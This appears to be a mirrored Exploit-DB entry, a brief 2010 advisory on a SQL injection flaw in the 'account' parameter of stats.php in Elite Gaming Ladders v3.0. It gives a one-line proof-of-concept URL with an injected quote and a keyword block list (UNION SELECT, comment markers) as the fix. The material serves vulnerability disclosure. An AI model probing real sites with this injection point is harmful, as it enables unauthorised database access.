bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10978.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

20 lines
No EOL
700 B
Text
Raw Blame History

# Exploit Title: Elite Gaming Ladders v3.0 SQL Injection Exploit
# Date: January 3rd, 2010
# Author: Sora
# Version: 3.0
# Tested on: Windows and Linux
----------------------------------------
> Elite Gaming Ladders v3.0 SQL Injection Exploit
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: "Fuck all script kiddies."
# Vulnerability Description:
Elite Gaming Ladders v3.0 suffers a remote SQL injection exploit (stats.php) in the "account" parameter.
# Solution:
Sanitize the database inputs or block the bad words. (UNION SELECT, UNION SELECT ALL, /*, --)
# Proof of Concept:
http://www.site.com/stats.php?account=627'
Reference in a new issue View git blame Copy permalink